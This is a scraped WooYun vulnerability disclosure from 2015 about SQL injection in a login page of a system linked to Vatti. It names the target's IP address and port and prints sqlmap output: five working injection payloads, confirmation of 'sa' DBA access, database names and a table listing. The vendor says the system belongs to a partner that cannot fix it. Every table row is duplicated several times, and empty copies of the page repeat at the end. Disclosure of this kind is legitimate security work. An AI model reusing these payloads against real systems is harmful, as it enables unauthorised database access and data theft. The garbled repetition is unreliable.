华帝股份有限公司某系统存在SQL注入（DBA权限/泄漏敏感数据）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162872

漏洞标题：华帝股份有限公司某系统存在SQL注入（DBA权限/泄漏敏感数据）

漏洞作者：路人甲

提交时间：2015-12-21 12:11

修复时间：2016-02-01 10:51

公开时间：2016-02-01 10:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-21：细节已通知厂商并且等待厂商处理中
2015-12-21：厂商已经确认，细节仅向厂商公开
2015-12-31：细节向核心白帽子及相关领域专家公开
2016-01-10：细节向普通白帽子公开
2016-01-20：细节向实习白帽子公开
2016-02-01：细节向公众公开

简要描述：

！——！

详细说明：

注入点：

http://222.209.200.74:8000/login.aspx (POST)
LoginID=admin&loginPassword=123456&imageField.x=41&imageField.y=23

LoginID存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: LoginID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: LoginID=admin' AND 8798=8798 AND 'nyPE'='nyPE&loginPassword=123456&
imageField.x=41&imageField.y=23
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LoginID=admin' AND 1371=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHA
R(97)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN (1371=1371) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(110)+CHAR(113))) AND 'bwsZ'='bwsZ&
loginPassword=123456&imageField.x=41&imageField.y=23
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: LoginID=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+
CHAR(108)+CHAR(97)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(76)+CHAR(83)+CHAR(89)+CHAR(
81)+CHAR(101)+CHAR(70)+CHAR(73)+CHAR(69)+CHAR(116)+CHAR(113)+CHAR(109)+CHAR(102)
+CHAR(110)+CHAR(113)-- &loginPassword=123456&imageField.x=41&imageField.y=23
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: LoginID=admin'; WAITFOR DELAY '0:0:5'--&loginPassword=123456&imageF
ield.x=41&imageField.y=23
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: LoginID=admin' WAITFOR DELAY '0:0:5'--&loginPassword=123456&imageFi
eld.x=41&imageField.y=23
---
[03:12:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[03:12:51] [INFO] fetching current user
current user:    'sa'
[03:12:52] [INFO] fetching current database
current database:    'zhongduan'
[03:12:52] [INFO] testing if current user is DBA
current user is DBA:    True
database management system users [1]:
[*] sa
available databases [18]:
[*] BC40Fee
[*] CallCenter
[*] chugui
[*] drpsys
[*] drpsysww
[*] hdcd
[*] jidiao
[*] leilu
[*] master
[*] model
[*] msdb
[*] nEWASSDB
[*] qiaofuren
[*] shuaikang
[*] tempdb
[*] VantageCNT
[*] yangwei
[*] zhongduan
Database: zhongduan
+------------------------------------------------+---------+
| Table                                          | Entries |
+------------------------------------------------+---------+
| dbo.Main_Log                                   | 26577   |
| dbo.Main_Log                                   | 26577   |
| dbo.Main_Log                                   | 26577   |
| dbo.Main_Log                                   | 26577   |
| dbo.Main_Log                                   | 26577   |
| dbo.Main_OperationLog                          | 11439   |
| dbo.Main_OperationLog                          | 11439   |
| dbo.Main_OperationLog                          | 11439   |
| dbo.Main_OperationLog                          | 11439   |
| dbo.Main_OperationLog                          | 11439   |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.Store_ProductDetail                        | 5140    |
| dbo.View_Store_UpperAndLowerProductQuery       | 5140    |
| dbo.View_Store_UpperAndLowerProductQuery       | 5140    |
| dbo.View_Store_UpperAndLowerProductQuery       | 5140    |
| dbo.View_Store_UpperAndLowerProductQuery       | 5140    |
| dbo.View_Store_UpperAndLowerProductQuery       | 5140    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.View_Main_UserFunction                     | 3370    |
| dbo.Store_Duty                                 | 2941    |
| dbo.Store_Duty                                 | 2941    |
| dbo.Store_Duty                                 | 2941    |
| dbo.Store_Duty                                 | 2941    |
| dbo.Store_Duty                                 | 2941    |
| dbo.View_Store_Duty                            | 2941    |
| dbo.View_Store_Duty                            | 2941    |
| dbo.View_Store_Duty                            | 2941    |
| dbo.View_Store_Duty                            | 2941    |
| dbo.View_Store_Duty                            | 2941    |
| dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941    |
| dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941    |
| dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941    |
| dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941    |
| dbo.View_Store_ShoppingGuideWorkConditionQuery | 2941    |
| dbo.Frame_Field                                | 938     |
| dbo.Frame_Field                                | 938     |
| dbo.Frame_Field                                | 938     |
| dbo.Frame_Field                                | 938     |
| dbo.Frame_Field                                | 938     |
| dbo.Store_Sales                                | 720     |
| dbo.Store_Sales                                | 720     |
| dbo.Store_Sales                                | 720     |
| dbo.Store_Sales                                | 720     |
| dbo.Store_Sales                                | 720     |
| dbo.View_Store_SalesStatistics                 | 720     |
| dbo.View_Store_SalesStatistics                 | 720     |
| dbo.View_Store_SalesStatistics                 | 720     |
| dbo.View_Store_SalesStatistics                 | 720     |
| dbo.View_Store_SalesStatistics                 | 720     |
| dbo.View_StoreSales                            | 720     |
| dbo.View_StoreSales                            | 720     |
| dbo.View_StoreSales                            | 720     |
| dbo.View_StoreSales                            | 720     |
| dbo.View_StoreSales                            | 720     |
| dbo.ViewSales                                  | 720     |
| dbo.ViewSales                                  | 720     |
| dbo.ViewSales                                  | 720     |
| dbo.ViewSales                                  | 720     |
| dbo.ViewSales                                  | 720     |
| dbo.Frame_RoleOperating                        | 625     |
| dbo.Frame_RoleOperating                        | 625     |
| dbo.Frame_RoleOperating                        | 625     |
| dbo.Frame_RoleOperating                        | 625     |
| dbo.Frame_RoleOperating                        | 625     |
| dbo.Main_Photo                                 | 400     |
| dbo.Main_Photo                                 | 400     |
| dbo.Main_Photo                                 | 400     |
| dbo.Main_Photo                                 | 400     |
| dbo.Main_Photo                                 | 400     |
| dbo.View_Main_Photo                            | 400     |
| dbo.View_Main_Photo                            | 400     |
| dbo.View_Main_Photo                            | 400     |
| dbo.View_Main_Photo                            | 400     |
| dbo.View_Main_Photo                            | 400     |
| dbo.View_ShowPhotoList                         | 400     |
| dbo.View_ShowPhotoList                         | 400     |
| dbo.View_ShowPhotoList                         | 400     |
| dbo.View_ShowPhotoList                         | 400     |
| dbo.View_ShowPhotoList                         | 400     |
| dbo.Products                                   | 364     |
| dbo.Products                                   | 364     |
| dbo.Products                                   | 364     |
| dbo.Products                                   | 364     |
| dbo.Products                                   | 364     |
| dbo.View_StoreProducts                         | 364     |
| dbo.View_StoreProducts                         | 364     |
| dbo.View_StoreProducts                         | 364     |
| dbo.View_StoreProducts                         | 364     |
| dbo.View_StoreProducts                         | 364     |
| dbo.Store_DailyReport                          | 363     |
| dbo.Store_DailyReport                          | 363     |
| dbo.Store_DailyReport                          | 363     |
| dbo.Store_DailyReport                          | 363     |
| dbo.Store_DailyReport                          | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.View_StoreDailyReportk                     | 363     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.Main_RoleFunction                          | 301     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.View_StorePhotoExt                         | 192     |
| dbo.Store_Info                                 | 191     |
| dbo.Store_Info                                 | 191     |
| dbo.Store_Info                                 | 191     |
| dbo.Store_Info                                 | 191     |
| dbo.Store_Info                                 | 191     |
| dbo.Store_CrewScheduling                       | 189     |
| dbo.Store_CrewScheduling                       | 189     |
| dbo.Store_CrewScheduling                       | 189     |
| dbo.Store_CrewScheduling                       | 189     |
| dbo.Store_CrewScheduling                       | 189     |
| dbo.View_Store_CrewScheduling                  | 189     |
| dbo.View_Store_CrewScheduling                  | 189     |
| dbo.View_Store_CrewScheduling                  | 189     |
| dbo.View_Store_CrewScheduling                  | 189     |
| dbo.View_Store_CrewScheduling                  | 189     |
| dbo.View_StoreMap                              | 183     |
| dbo.View_StoreMap                              | 183     |
| dbo.View_StoreMap                              | 183     |
| dbo.View_StoreMap                              | 183     |
| dbo.View_StoreMap                              | 183     |
| dbo.Store_Staff                                | 165     |
| dbo.Store_Staff                                | 165     |
| dbo.Store_Staff                                | 165     |
| dbo.Store_Staff                                | 165     |
| dbo.Store_Staff                                | 165     |
| dbo.View_DGYCX                                 | 165     |
| dbo.View_DGYCX                                 | 165     |
| dbo.View_DGYCX                                 | 165     |
| dbo.View_DGYCX                                 | 165     |
| dbo.View_DGYCX                                 | 165     |
| dbo.View_Store_Staff                           | 165     |
| dbo.View_Store_Staff                           | 165     |
| dbo.View_Store_Staff                           | 165     |
| dbo.View_Store_Staff                           | 165     |
| dbo.View_Store_Staff                           | 165     |
| dbo.View_Store_Product                         | 164     |
| dbo.View_Store_Product                         | 164     |
| dbo.View_Store_Product                         | 164     |
| dbo.View_Store_Product                         | 164     |
| dbo.View_Store_Product                         | 164     |
| dbo.Frame_Operating                            | 129     |
| dbo.Frame_Operating                            | 129     |
| dbo.Frame_Operating                            | 129     |
| dbo.Frame_Operating                            | 129     |
| dbo.Frame_Operating                            | 129     |
| dbo.Main_Dictionary                            | 100     |
| dbo.Main_Dictionary                            | 100     |
| dbo.Main_Dictionary                            | 100     |
| dbo.Main_Dictionary                            | 100     |
| dbo.Main_Dictionary                            | 100     |
| dbo.View_Main_Dictionary                       | 100     |
| dbo.View_Main_Dictionary                       | 100     |
| dbo.View_Main_Dictionary                       | 100     |
| dbo.View_Main_Dictionary                       | 100     |
| dbo.View_Main_Dictionary                       | 100     |
| dbo.ReceiptMaxNumber                           | 78      |
| dbo.ReceiptMaxNumber                           | 78      |
| dbo.ReceiptMaxNumber                           | 78      |
| dbo.ReceiptMaxNumber                           | 78      |
| dbo.ReceiptMaxNumber                           | 78      |
| dbo.Main_UserRole                              | 71      |
| dbo.Main_UserRole                              | 71      |
| dbo.Main_UserRole                              | 71      |
| dbo.Main_UserRole                              | 71      |
| dbo.Main_UserRole                              | 71      |
| dbo.ViewDailyReport                            | 66      |
| dbo.ViewDailyReport                            | 66      |
| dbo.ViewDailyReport                            | 66      |
| dbo.ViewDailyReport                            | 66      |
| dbo.ViewDailyReport                            | 66      |
| dbo.Frame_Program                              | 55      |
| dbo.Frame_Program                              | 55      |
| dbo.Frame_Program                              | 55      |
| dbo.Frame_Program                              | 55      |
| dbo.Frame_Program                              | 55      |
| dbo.Main_Function                              | 52      |
| dbo.Main_Function                              | 52      |
| dbo.Main_Function                              | 52      |
| dbo.Main_Function                              | 52      |
| dbo.Main_Function                              | 52      |
| dbo.Frame_Object                               | 43      |
| dbo.Frame_Object                               | 43      |
| dbo.Frame_Object                               | 43      |
| dbo.Frame_Object                               | 43      |
| dbo.Frame_Object                               | 43      |
| dbo.Main_ProucetRef                            | 43      |
| dbo.Main_ProucetRef                            | 43      |
| dbo.Main_ProucetRef                            | 43      |
| dbo.Main_ProucetRef                            | 43      |
| dbo.Main_ProucetRef                            | 43      |
| dbo.Main_User                                  | 33      |
| dbo.Main_User                                  | 33      |
| dbo.Main_User                                  | 33      |
| dbo.Main_User                                  | 33      |
| dbo.Main_User                                  | 33      |
| dbo.Store_ProductType                          | 31      |
| dbo.Store_ProductType                          | 31      |
| dbo.Store_ProductType                          | 31      |
| dbo.Store_ProductType                          | 31      |
| dbo.Store_ProductType                          | 31      |
| dbo.Store_Location                             | 22      |
| dbo.Store_Location                             | 22      |
| dbo.Store_Location                             | 22      |
| dbo.Store_Location                             | 22      |
| dbo.Store_Location                             | 22      |
| dbo.Main_DictionaryType                        | 19      |
| dbo.Main_DictionaryType                        | 19      |
| dbo.Main_DictionaryType                        | 19      |
| dbo.Main_DictionaryType                        | 19      |
| dbo.Main_DictionaryType                        | 19      |
| dbo.Store_LeaseApproach                        | 19      |
| dbo.Store_LeaseApproach                        | 19      |
| dbo.Store_LeaseApproach                        | 19      |
| dbo.Store_LeaseApproach                        | 19      |
| dbo.Store_LeaseApproach                        | 19      |
| dbo.View_Store_LeaseApproach                   | 19      |
| dbo.View_Store_LeaseApproach                   | 19      |
| dbo.View_Store_LeaseApproach                   | 19      |
| dbo.View_Store_LeaseApproach                   | 19      |
| dbo.View_Store_LeaseApproach                   | 19      |
| dbo.Store_Advertising                          | 13      |
| dbo.Store_Advertising                          | 13      |
| dbo.Store_Advertising                          | 13      |
| dbo.Store_Advertising                          | 13      |
| dbo.Store_Advertising                          | 13      |
| dbo.View_Store_Advertising                     | 13      |
| dbo.View_Store_Advertising                     | 13      |
| dbo.View_Store_Advertising                     | 13      |
| dbo.View_Store_Advertising                     | 13      |
| dbo.View_Store_Advertising                     | 13      |
| dbo.Frame_FieldType                            | 12      |
| dbo.Frame_FieldType                            | 12      |
| dbo.Frame_FieldType                            | 12      |
| dbo.Frame_FieldType                            | 12      |
| dbo.Frame_FieldType                            | 12      |
| dbo.Department                                 | 11      |
| dbo.Department                                 | 11      |
| dbo.Department                                 | 11      |
| dbo.Department                                 | 11      |
| dbo.Department                                 | 11      |
| dbo.Main_OrganizationType                      | 9       |
| dbo.Main_OrganizationType                      | 9       |
| dbo.Main_OrganizationType                      | 9       |
| dbo.Main_OrganizationType                      | 9       |
| dbo.Main_OrganizationType                      | 9       |
| dbo.Store_CostType                             | 7       |
| dbo.Store_CostType                             | 7       |
| dbo.Store_CostType                             | 7       |
| dbo.Store_CostType                             | 7       |
| dbo.Store_CostType                             | 7       |
| dbo.View_Store_CostType                        | 7       |
| dbo.View_Store_CostType                        | 7       |
| dbo.View_Store_CostType                        | 7       |
| dbo.View_Store_CostType                        | 7       |
| dbo.View_Store_CostType                        | 7       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Store_CostAttribute                        | 6       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_FileCategory                          | 3       |
| dbo.Main_LoadCompany                           | 3       |
| dbo.Main_LoadCompany                           | 3       |
| dbo.Main_LoadCompany                           | 3       |
| dbo.Main_LoadCompany                           | 3       |
| dbo.Main_LoadCompany                           | 3       |
| dbo.Main_Config                                | 2       |
| dbo.Main_Config                                | 2       |
| dbo.Main_Config                                | 2       |
| dbo.Main_Config                                | 2       |
| dbo.Main_Config                                | 2       |
| dbo.Main_Application                           | 1       |
| dbo.Main_Application                           | 1       |
| dbo.Main_Application                           | 1       |
| dbo.Main_Application                           | 1       |
| dbo.Main_Application                           | 1       |
| dbo.Main_Department                            | 1       |
| dbo.Main_Department                            | 1       |
| dbo.Main_Department                            | 1       |
| dbo.Main_Department                            | 1       |
| dbo.Main_Department                            | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.Store_DecorationDetail                     | 1       |
| dbo.View_CostStatistics                        | 1       |
| dbo.View_CostStatistics                        | 1       |
| dbo.View_CostStatistics                        | 1       |
| dbo.View_CostStatistics                        | 1       |
| dbo.View_CostStatistics                        | 1       |
| dbo.View_Decoration                            | 1       |
| dbo.View_Decoration                            | 1       |
| dbo.View_Decoration                            | 1       |
| dbo.View_Decoration                            | 1       |
| dbo.View_Decoration                            | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_Store_DecorationMaterials             | 1       |
| dbo.View_StoreCost                             | 1       |
| dbo.View_StoreCost                             | 1       |
| dbo.View_StoreCost                             | 1       |
| dbo.View_StoreCost                             | 1       |
| dbo.View_StoreCost                             | 1       |
| dbo.View_StoreDecoration                       | 1       |
| dbo.View_StoreDecoration                       | 1       |
| dbo.View_StoreDecoration                       | 1       |
| dbo.View_StoreDecoration                       | 1       |
| dbo.View_StoreDecoration                       | 1       |
+------------------------------------------------+---------+

以admin、chenfei进行登录验证！~~~

DBA权限！！！！如图，就不渗入了！~~~

漏洞证明：

如上

修复方案：

过滤修复

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2015-12-21 14:01

厂商回复：

这个不是我公司的系统，他是一个合作伙伴的应用系统。代他们向路人甲表示感谢，但他们不具备修复能力，请不要公开，谢谢。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162872

漏洞标题：华帝股份有限公司某系统存在SQL注入（DBA权限/泄漏敏感数据）

相关厂商：华帝股份有限公司

漏洞作者：路人甲

提交时间：2015-12-21 12:11

修复时间：2016-02-01 10:51

公开时间：2016-02-01 10:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0162872

漏洞标题：华帝股份有限公司某系统存在SQL注入（DBA权限/泄漏敏感数据）

相关厂商：华帝股份有限公司

漏洞作者： 路人甲

提交时间：2015-12-21 12:11

修复时间：2016-02-01 10:51

公开时间：2016-02-01 10:51

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0162872"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云